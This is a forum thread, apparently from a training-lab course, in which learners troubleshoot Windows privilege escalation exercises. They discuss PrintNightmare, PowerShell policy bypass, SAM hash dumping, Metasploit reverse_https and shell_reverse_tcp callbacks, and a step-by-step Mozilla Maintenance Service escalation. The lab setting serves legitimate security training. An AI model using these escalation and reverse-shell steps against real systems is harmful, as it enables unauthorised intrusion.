Hi, I am not sure what is going on on this section Kernel Exploits in Windows Privilege Escalation.
I can obtain the hashes from SAM database, though can’t crack it with hashcat nor john
But I can’t use the PS1 script for Print Nightmare, Windows is not allowing loading the PS script
and I am not able to get a metarpreter shell as explained. I receive a callback from machine, but no session is opened.
Any clues or directions?
Cheers
It seems the VM were already exploited. I did a quick check and I’ve found the user hacker.
But I was unable to load the PS script as it says the execution script has been disabled and the dumped hashed were not possible to decode them.
I got my flag as I managed to create a new user after bypass PS policy, but the meterpreter session didnt work. anybody faced the message below?
ayload options (windows/x64/meterpreter/reverse_https):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (Accepted: ‘’, seh, thread, process, none)
LHOST 10.10.x.xx yes The local listener hostname
LPORT 80 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
0 Wildcard Target
msf6 exploit(multi/handler) > run
[] Started HTTPS reverse handler on https://10.10.xx.xx:80
[] https://10.10.X.X:80 handling request from 10.129.43.13; (UUID: g7a8ehsz) Staging x64 payload (201308 bytes) …
[-] Failed to load extension: No response was received to the core_loadlib request.
[*] Meterpreter session 1 opened (10.10.X.X:80 → 127.0.0.1 ) at 2022-01-04 14:54:40 +1100
i was able to start up a meterpreter session but after ANY command i run, it kills the connection
Putting this up here in case someone needs it.
- Create the new local admin using the info provided in the module.
- Move on to the Mozilla service exploit and follow the instructions in the module. (Move all executables over to machine before moving on to next step i.e maintenanceservice.exe and maintenanceservice2.exe, you can go ahead and run the exploit and copy over the maintenanceservice2.exe, but DO NOT start the MozillaMaintenance service just yet).
- On the victim machine, start a command prompt using runas /user:“TheNewAdminYouCreatedInFirstStep” cmd.exe
- This will open up a new cmd prompt under the new local admin account you created.
- Type regedit
- In regedit go to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MozillaMaintenance
- Create a new DWORD(32-bit) name it ServicePipeTimeout.
- Set the ServicePipeTimeout value to 360000.
- Close regedit.
- On the attack machine start your metasploit console with the resource file provided.
- On the victim machine under the same local admin cmd prompt run the command: start sc MozillaMaintenance
- Check on your attack machine for the callback.
- You should have a steady connection that does not drop out and allow you to download the flag.
I hope this helps someone as this is how I got it to work for me.
for anyone having issues with the meterpreter shell, use a windows/x64/shell_reverse_tcp when creating the payload and set up a nc listener instead of using meterpreter
1 Like
I UNDERSTAND THAT IT IS NOT THE MOST APPROPRIATE WAY, BUT TO GET THE FLAG THE SERVICE IN METASPLOIT DIES AFTER A FEW SECONDS, SO YOU HAVE TO BE FAST. JUST START THE REVERSE SHELL IN MSF
shell
type c:\UsersAdministrator flag.txt
AND YOU WILL GET THE FLAG
i love you